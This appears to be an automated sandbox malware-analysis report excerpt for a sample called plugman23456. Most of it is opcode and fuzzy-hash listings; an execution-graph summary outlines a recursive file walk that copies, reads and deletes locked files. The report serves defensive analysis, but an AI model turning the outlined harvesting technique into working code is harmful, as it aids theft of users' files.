                          • Opcode ID: 6c3b319a3204e75b3035bf2be4a8b976b5bf0d75352126336ed60b0e845cb75f
                          • Instruction ID: 1eee042bf9888b18b168e11756f36ff176a46e273564bd0a52aa4263b9e648b9
                          • Opcode Fuzzy Hash: 6c3b319a3204e75b3035bf2be4a8b976b5bf0d75352126336ed60b0e845cb75f
                          • Instruction Fuzzy Hash: 54E09274C092889FCB01DBA4DC505EE7F74EB46344F1481DAC84837152C6711A5ADB21
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 297de1fa52f72a637307d47acfb1c6c6d8d7258bc5c996fa64481b4fd77d75db
                          • Instruction ID: 5fd31e47241121b56251165c8f49bf77d6a13ef9bb48e93924c48cb45e6fcf9e
                          • Opcode Fuzzy Hash: 297de1fa52f72a637307d47acfb1c6c6d8d7258bc5c996fa64481b4fd77d75db
                          • Instruction Fuzzy Hash: B1E0927A40D105CFCB10CFA0E8045A47EA8BA563497A4A066C48A8B1E2F7608502EA36
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4437c3a266acd1c12a7d661b8150218db236247db61ae30a610179e3e967563c
                          • Instruction ID: 8b5f135a84775df3e52c48d68106e4c82944cd16b59ee18c720342aea9a55175
                          • Opcode Fuzzy Hash: 4437c3a266acd1c12a7d661b8150218db236247db61ae30a610179e3e967563c
                          • Instruction Fuzzy Hash: 59E0EE75E19219EBCF00DBE8E4509ECBBF8EB8D310B10A826D459B7254E23098258F64
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ae1f21b3143dce3b6c0aba4a39bebd121d60e7010e9c4fbf61f3770ce5a518e
                          • Instruction ID: 6a7c54049de20939b43e222c52e2aaf8e025757d533e69472416298b4b6ed5c1
                          • Opcode Fuzzy Hash: 9ae1f21b3143dce3b6c0aba4a39bebd121d60e7010e9c4fbf61f3770ce5a518e
                          • Instruction Fuzzy Hash: 37E048B48092849FDB15CBB4DC653EC7F709B47241F0841DBC981562A1D6B14A46DF51
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af9252fe189039e7db0786bdeac96a7fe057f7b0fc1f8e63b490584f04cbcf98
                          • Instruction ID: 505b4dac5836b2e1cea8ecb14ba6f10eb1a48f3049c01fd44808faee9d4c34e8
                          • Opcode Fuzzy Hash: af9252fe189039e7db0786bdeac96a7fe057f7b0fc1f8e63b490584f04cbcf98
                          • Instruction Fuzzy Hash: B4E0B63681C205CFCB18CFA594542FC7EB8A71F34AF14F02AD18AA21E2E3788585DF24
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec37358ac4c11c2bd2b240c132334df042107cb424638c721e11f11ad76d5548
                          • Instruction ID: e3f6dc101e1422b9f2c210f955ddf39f5f8b4079b825ea6121ef711b33804301
                          • Opcode Fuzzy Hash: ec37358ac4c11c2bd2b240c132334df042107cb424638c721e11f11ad76d5548
                          • Instruction Fuzzy Hash: 73E026F8C0A284AFC741CFB8C81429C7FF4AB06300F0542CBC444D3252D6B10E05EB11
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01afe04182b1f2cf1f92a95d73ea7befd80328a15cde2477135d62416a4387da
                          • Instruction ID: 132655de6916fa88375ffb45c3f48dd77c0951eb43599ff93f7b7987d148d607
                          • Opcode Fuzzy Hash: 01afe04182b1f2cf1f92a95d73ea7befd80328a15cde2477135d62416a4387da
                          • Instruction Fuzzy Hash: 87F03974909288DFDB12DFA8D86469C7FB0AF4A305F1881EBD884973A1D3345A04DF51
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d76632eae37fc49c0890f9015201c29b4e82409ecd4d86ad2a5996a2132f8b42
                          • Instruction ID: 9e1f010b6aff983be083b701a7896d96c20e72fbfe1bf81d0649de1d7b0f8d73
                          • Opcode Fuzzy Hash: d76632eae37fc49c0890f9015201c29b4e82409ecd4d86ad2a5996a2132f8b42
                          • Instruction Fuzzy Hash: 26E09B3480E1886FCB02DB78D41159D7F709B43300F14C2DAC84557151D7305905DB53
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31490599f84c1e01c8a075bd62102a2fb681d8ad540e45a8dc4de088cb976e42
                          • Instruction ID: 6658209e974462cbb237f918da2ca9af86a8b439c1193c501fffa4b0d2e50a20
                          • Opcode Fuzzy Hash: 31490599f84c1e01c8a075bd62102a2fb681d8ad540e45a8dc4de088cb976e42
                          • Instruction Fuzzy Hash: 71E04F7484E2C4AFC316D7B498606697F745B43200F0801DFC444961E2D6750D05CB62
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d7eac925ba3b8ff48d2370d8aa30efe41a3c7491579c3fe69f3238670e3dac2
                          • Instruction ID: 8fdc496f7f3af1ba2145ebda462f626125ad988ecb76a2da9dd667b37085b2cb
                          • Opcode Fuzzy Hash: 6d7eac925ba3b8ff48d2370d8aa30efe41a3c7491579c3fe69f3238670e3dac2
                          • Instruction Fuzzy Hash: 88E04F7480A3CADED717DBA4992536CBF70AF47244F0841DBC4945A5A3D7354E42CB12
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0391e63345e8180f58bd0b6417a501beff5e22e0399049447e0946d31b01b3a9
                          • Instruction ID: 58299eb07a4a1faf4045d39f1de28ddedfd949d891de13fb87cdbdc7f11eb6f9
                          • Opcode Fuzzy Hash: 0391e63345e8180f58bd0b6417a501beff5e22e0399049447e0946d31b01b3a9
                          • Instruction Fuzzy Hash: 8AE01A7A901218AFDB50DF90CD40BE8BBB9EB48315F1481D9D919A7290CB359F86DF10
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c255f2d6f16e612677add450e20d39a85954b0006eeea7cec88cf88ef65281ed
                          • Instruction ID: 7680f5d1c9de06cc24e80eecf41e73345d3f2bc5051235fed982bf108f20fb67
                          • Opcode Fuzzy Hash: c255f2d6f16e612677add450e20d39a85954b0006eeea7cec88cf88ef65281ed
                          • Instruction Fuzzy Hash: 20E03234A08229CFDB24CE01C840BA9B3B5AB48304F80D5E9848DA3244EB319F85EF30
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb7e7a5802a87c90b86778ca2a439d11237fbe389346b1d240df046a547fbdaa
                          • Instruction ID: af07c3e2040ea7f2dccf377340110c8e7db44f31db23813e261112f65265dd47
                          • Opcode Fuzzy Hash: bb7e7a5802a87c90b86778ca2a439d11237fbe389346b1d240df046a547fbdaa
                          • Instruction Fuzzy Hash: 24D02B7884E384AECB12CBB4E820A6D3FB45F42200F0442CFC644971E3C6B40E08DB21
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad8b12a18a1397818a4db976344847ffa23abfe9db507b0c1e9753cce0111acc
                          • Instruction ID: b97696e54ef4602d562c3efa0798afd794ecd4179d414ce80ed963823060ec4a
                          • Opcode Fuzzy Hash: ad8b12a18a1397818a4db976344847ffa23abfe9db507b0c1e9753cce0111acc
                          • Instruction Fuzzy Hash: 5AE0E579A08218DFDF20CF94CC80BECBBB5AB48304F20809A950CAB381D7359A85DF00
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ffe399b79e0e1b90a1573fffec5790937ab2e57452bc8343cdf53670944bd03
                          • Instruction ID: 58fcd9d1c356e3b3586006ad05076cea343e0125bf362dd6277f8842526fb07d
                          • Opcode Fuzzy Hash: 1ffe399b79e0e1b90a1573fffec5790937ab2e57452bc8343cdf53670944bd03
                          • Instruction Fuzzy Hash: 08E08C30409144AEC705CBE8DC51AAD7F389746312F14419BC808E2191DB31080ACE20
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e29831258a1c586d9b24e8950ad89858a00b4dc851ca65972ecd3868a048a519
                          • Instruction ID: 3d3b6916540be0dfe72ef6ab01e3577cd33adb0e602866b1358ac80299926718
                          • Opcode Fuzzy Hash: e29831258a1c586d9b24e8950ad89858a00b4dc851ca65972ecd3868a048a519
                          • Instruction Fuzzy Hash: 24E0260A80E2D086CB02CA646892348BFB48F03318F0914CFC1C81B087C600410DC72A
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28ebbd3af5cf11d0846a01c16f883f1ab0defeb32b6704ec8839fb90e65da81b
                          • Instruction ID: c5acecf45eca38b2ba7cd29ecf2aa40c009ff3341dffe55664dd3909e9c6c2f3
                          • Opcode Fuzzy Hash: 28ebbd3af5cf11d0846a01c16f883f1ab0defeb32b6704ec8839fb90e65da81b
                          • Instruction Fuzzy Hash: B8E0B638D04208EFCB14DFA9D5556ACBFB4EF89301F1481EAD844573A0D734AA41DF91
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d857c1a350ba319f5ba5407c2be5ac0fde1273aa9be02cdfba5609322e4a43d1
                          • Instruction ID: 3968f9810d045b50956ef96759a4d06fe812595e2ca457f2abf14afd93832af0
                          • Opcode Fuzzy Hash: d857c1a350ba319f5ba5407c2be5ac0fde1273aa9be02cdfba5609322e4a43d1
                          • Instruction Fuzzy Hash: 4BE0B674910208EFC744DFA8D58465CBBF4AB09301F6041A9D90897360E7309A44DF51
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc3334b97fa78d1d1a0e5307d35d2cfe5cf9b6ea23cc9c02b37a7559ed3d2a90
                          • Instruction ID: d678aa8747837d4999ac8cdadde1e11a0f3e5cb20efc1d29ddab2f0142877760
                          • Opcode Fuzzy Hash: fc3334b97fa78d1d1a0e5307d35d2cfe5cf9b6ea23cc9c02b37a7559ed3d2a90
                          • Instruction Fuzzy Hash: 51D05E3480910CEBCB04DFA8E9516ADBBB8AB82300F1092A9C80823240D7705E46EBA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1509d6cccad03149069044bf6dfd6c478a0b54f09a2191cb88d8eede93eced6f
                          • Instruction ID: f54dc30d671ccc6d824c49f7ef8ee7600c385445b7df1f1aaf5992c9a7e67514
                          • Opcode Fuzzy Hash: 1509d6cccad03149069044bf6dfd6c478a0b54f09a2191cb88d8eede93eced6f
                          • Instruction Fuzzy Hash: A5D05E30C05208EBC704DFA8EC406BDBBB8FB42301F6081A9CC4833240D7301E56DB91
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98b49d46a1aa718cc93aac13ad8784118ad18b6949164472cdb8b5b7f6935d77
                          • Instruction ID: fce5baeed660ef5c52f4c231690d32c770099585ed2622e9a56f9344d7b2469a
                          • Opcode Fuzzy Hash: 98b49d46a1aa718cc93aac13ad8784118ad18b6949164472cdb8b5b7f6935d77
                          • Instruction Fuzzy Hash: D4D01730D00248EFCB48EFA8D88579DBBF4AB04300F1080AAC80893340E7309A84DB91
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3f7295df1ddaeef785f91d917ed3b35622a74326f32af277e90aaf6c3e49839
                          • Instruction ID: f688876c862f19680c467442c9c29ecd216de04dc787b37db2585dd638dc1118
                          • Opcode Fuzzy Hash: d3f7295df1ddaeef785f91d917ed3b35622a74326f32af277e90aaf6c3e49839
                          • Instruction Fuzzy Hash: C7D0C970401209EBC704DBE9D955B5DBB68A746742F04519AD40863290EB711D01DAA5
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbad7b3a2c81bf04a77752b3ae74237d6b4b3e6c325047c2a751744ab79457cb
                          • Instruction ID: 80c9124c3794cbf095126a0fddc59f4c534e431ec7b05d275ae1a191a8d9933b
                          • Opcode Fuzzy Hash: cbad7b3a2c81bf04a77752b3ae74237d6b4b3e6c325047c2a751744ab79457cb
                          • Instruction Fuzzy Hash: A7D05E34800248EFC714DFE8E81826CBFB4AB05201F0840AAC84412290E7301A45DF91
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5832bfcfa3eabd8ae7335c8cf5a3a048377f6e4aab570b69d6f3456ffb1fa5b6
                          • Instruction ID: f91e157021a411d275d8477b8ccd530123c8f44f882f29fb97dc292ce08ebb1e
                          • Opcode Fuzzy Hash: 5832bfcfa3eabd8ae7335c8cf5a3a048377f6e4aab570b69d6f3456ffb1fa5b6
                          • Instruction Fuzzy Hash: 78D0C979901208EFCB44DFEDDA0975DBBF8EB09351F1485AAD808D3251E7315E01EB61
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b925313f47cb06490a02b8c0ebecbcf4cfc36125e0a8ed4bff62a03f2057066
                          • Instruction ID: 332b0caac9ae55b25cb5652944a5826e9bd621843b4e6c64ffd7f55de39ed740
                          • Opcode Fuzzy Hash: 0b925313f47cb06490a02b8c0ebecbcf4cfc36125e0a8ed4bff62a03f2057066
                          • Instruction Fuzzy Hash: C8C0123044521DEBC704DBE9D81576D77AC9741245F044199C50813290DB715E40DB95
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cec2ebba3e884378f94c5104af24312706be328c26fae29b74680e55c1373e1a
                          • Instruction ID: cf38ed6efecc2477bac3ae86b3554c08a1e45474445b3b39e33a80a2bd6c4985
                          • Opcode Fuzzy Hash: cec2ebba3e884378f94c5104af24312706be328c26fae29b74680e55c1373e1a
                          • Instruction Fuzzy Hash: C4C0123080114DABC718DF99D911B6E776CD741354F444099C40813250EB311D00EBA1
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d4739d94ba39a3e1cf75f21a41b8d83cdba3c971245e9f0f4e7860baa3fda97
                          • Instruction ID: 3b51b4900e08dee070503d0bb98ee6715f47bbb458c06842e077c44c1d7dfab3
                          • Opcode Fuzzy Hash: 6d4739d94ba39a3e1cf75f21a41b8d83cdba3c971245e9f0f4e7860baa3fda97
                          • Instruction Fuzzy Hash: F2C09B35E44405E7CB10DBD4F4150FCB735DBCA233F101062D11E93550972099559A55
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b6f4236f113e3f290eb558574ecec0bd1e9e08d69b3c38460208a51742869d5
                          • Instruction ID: a7f40816959fd3f462625d4a8ce506281d60631a23e3b367feb0f860a6fff3c5
                          • Opcode Fuzzy Hash: 4b6f4236f113e3f290eb558574ecec0bd1e9e08d69b3c38460208a51742869d5
                          • Instruction Fuzzy Hash: B4C00230918216CBCB14DBF0D8588ADBB3ABB8F302B20A119A54E631A6DB305802DE54
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aecc942aca0b57806319809a05e79ad7d15d60a1fe1f12124a63ab72d67cbb29
                          • Instruction ID: 965663a2db0e240463d7ea5f0341d7d3c4c0d80f09b2cfd9a22a085e1f0a3480
                          • Opcode Fuzzy Hash: aecc942aca0b57806319809a05e79ad7d15d60a1fe1f12124a63ab72d67cbb29
                          • Instruction Fuzzy Hash: E6B09238D5A014E6C708DA48E4518BCA23DAB8B381B20E604A04E231127920E8019524
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1549c6a7c43a0a985fdc3d7abd85d510a46cc988cc2e24c11bd4c65c97fb4bc
                          • Instruction ID: ce38f4e8d415ea391a915308418124c5d24dc8b554cfcaad469dcb49fa8f20e7
                          • Opcode Fuzzy Hash: c1549c6a7c43a0a985fdc3d7abd85d510a46cc988cc2e24c11bd4c65c97fb4bc
                          • Instruction Fuzzy Hash: C7C04C31507141C7D3009B60E8097663B72D702315F649006916B672D5D7748854D615
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56ba101aac5958102b1d59169776916b4054eaf9a66ad5fab767cb3dddc2a592
                          • Instruction ID: 2f7e04d6511e3eea3c53af698ac6e492cfe51b883fe7a2255ff0e66c4c5e0ff6
                          • Opcode Fuzzy Hash: 56ba101aac5958102b1d59169776916b4054eaf9a66ad5fab767cb3dddc2a592
                          • Instruction Fuzzy Hash: 98B0023509E404DFD6111678E44C578B955EB4530577555A0614F871F1D7905501AD14

                          Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2.6%
Total number of Nodes: 1698
Total number of Limit Nodes: 14

The execution graph is an interactive view in the report; on this page it survives only as a flat token stream in which "<node id> <address> [symbol or API names]" defines a node (a label such as "__dosmaperr 20 API calls" stands for a collapsed callee and its call count), "<from>-><to>" is an edge, and the stream breaks off at node 100023f5. All addresses fall in the 0x1000xxxx range, i.e. one image mapped at 0x10000000. The entry nodes and the imported APIs they reach, recovered from that stream:

• 10001c5b → 100012ee: GetEnvironmentVariableW, then eleven calls into 100010f1 interleaved with lstrlenW/lstrcatW. 100010f1 builds a search path (lstrlenW, lstrcatW) and walks it with FindFirstFileW/FindNextFileW/FindClose; each entry goes to 10001000, which builds the full path (lstrlenW, lstrcatW, 10001e89), checks GetFileAttributesW and then either hands the file to 1000173a or, via 100011ea (GetFileAttributesW again), calls back into 100010f1, i.e. a recursive directory walk. 1000173a → 10001cca is the file handler: CopyFileW, CreateFileW, GetFileSize, ReadFile, CloseHandle, DeleteFileW (DeleteFileW is also taken directly when CreateFileW fails). Copying a file, reading the copy and deleting it is the usual way to read a file that another process holds open. 1000173a also builds strings through 10001824 → 100015da (_strcat, _strlen, lstrlenW, lstrcatW), and 10001ede allocates through 100056d0 → 100056f9 RtlAllocateHeap, with an exception path through 10002908 → 100035d2 (__CxxThrowException@8, RaiseException).
• 1000220c → 10002215 → 100022b1 → 10002264: GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (the MSVC security-cookie seeding sequence); 1000220c also branches to 1000221a dllmain_dispatch.
• 100020db: ___scrt_is_nonwritable_in_current_image, dllmain_raw (10002110, 1000216d, 10002193), 10001eec (dllmain_crt_process_attach at 10001f1c, dllmain_crt_process_detach at 10001f2a), 1000240b → 100053e5, 100023ec → 10003513; the stream ends inside this subgraph at 100023f5.
• 10002049: ___scrt_is_nonwritable_in_current_image, ___scrt_fastfail (10002639), 1000244c (___scrt_release_startup_lock, _abort), 10002308 → 100034c7 RtlInterlockedFlushSList, __RTC_Initialize, 100020c4 → 1000246f → 100053ff/10005c2b and ___vcrt_uninitialize_ptd, 1000260b → 100053ed → 100074da, ___vcrt_uninitialize (10003529).
• 10002418 → ___scrt_release_startup_lock → 100047f5 → 10004815: __dosmaperr, _ValidateLocalCookies.
• 100073d5: RtlEnterCriticalSection, 10008be3, 10007269 (GetStartupInfoW, GetFileType), 1000731f (GetStdHandle, GetFileType), RtlLeaveCriticalSection (CRT standard-handle initialisation).
• 10007b48 → 10008ebf/10008ec8 (RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, 10008e78 with 66 API calls) and 1000a09c → 1000a026 → 10008e12 → 10009a22 → 10009b0d, the CRT file-write path: WriteFile, GetLastError, GetConsoleCP, GetConsoleMode, WideCharToMultiByte, WriteConsoleW, CreateFileW, SetFilePointerEx (10009f8d); the close path 1000adce → 1000ad24 → 1000ae4d reaches CloseHandle and SetStdHandle (10008cc1).
• 10004ed7 → 10006d60 (51 API calls) and 10007153: GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW; 10004f2f: _abort, ___std_exception_copy, _free.
• 1000a945 → 1000aa17/1000aa00 → 1000b19b __startOneArgErrorHandling → 1000b5c1 __raise_exc → 1000b7e5 RaiseException, with 100078a3 and 1000b8b2 (__dosmaperr) on the side paths.
• Single-call entry nodes: 10007103 (GetCommandLineA, GetCommandLineW), 1000724e (GetProcessHeap), 1000a1c6 (IsProcessorFeaturePresent), 10003c90 (RtlUnwind), 100036d0 (@_EH4_CallFilterFunc@8), 1000af43 → 1000af52 (CloseHandle), 1000284f (std::exception::exception).
• Remaining entry nodes are CRT housekeeping: 10008640 (__dosmaperr, __fassign, ___std_exception_copy), 10007a80 (_abort, _free, 10005eb7), 10007bc7 (RtlEnterCriticalSection/RtlLeaveCriticalSection around __fassign), 10005303 → 100050a5 (1000502f, 10005000, _ValidateLocalCookies, _free), 10005348 (___vcrt_uninitialize), 10008a89 → 10006d60 → 10006c5f, 10005351 (five _free calls), 10004a9a → 10005411 (_abort).
6668->6659 6671 10002408 6671->6659 6672 1000351e 7 API calls 6672->6668 6679 10005aca 6673->6679 6676 1000351e 6751 10003820 6676->6751 6678 10002415 6678->6659 6680 10005ad4 6679->6680 6681 10002410 6679->6681 6682 10005e08 _abort 11 API calls 6680->6682 6681->6676 6683 10005adb 6682->6683 6683->6681 6684 10005e5e _abort 11 API calls 6683->6684 6685 10005aee 6684->6685 6687 100059b5 6685->6687 6688 100059c0 6687->6688 6692 100059d0 6687->6692 6693 100059d6 6688->6693 6691 1000571e _free 20 API calls 6691->6692 6692->6681 6694 100059e9 6693->6694 6697 100059ef 6693->6697 6695 1000571e _free 20 API calls 6694->6695 6695->6697 6696 1000571e _free 20 API calls 6698 100059fb 6696->6698 6697->6696 6699 1000571e _free 20 API calls 6698->6699 6700 10005a06 6699->6700 6701 1000571e _free 20 API calls 6700->6701 6702 10005a11 6701->6702 6703 1000571e _free 20 API calls 6702->6703 6704 10005a1c 6703->6704 6705 1000571e _free 20 API calls 6704->6705 6706 10005a27 6705->6706 6707 1000571e _free 20 API calls 6706->6707 6708 10005a32 6707->6708 6709 1000571e _free 20 API calls 6708->6709 6710 10005a3d 6709->6710 6711 1000571e _free 20 API calls 6710->6711 6712 10005a48 6711->6712 6713 1000571e _free 20 API calls 6712->6713 6714 10005a56 6713->6714 6719 1000589c 6714->6719 6725 100057a8 6719->6725 6721 100058c0 6722 100058ec 6721->6722 6738 10005809 6722->6738 6724 10005910 6724->6691 6726 100057b4 ___scrt_is_nonwritable_in_current_image 6725->6726 6733 10005671 RtlEnterCriticalSection 6726->6733 6729 100057be 6730 1000571e _free 20 API calls 6729->6730 6731 100057e8 6729->6731 6730->6731 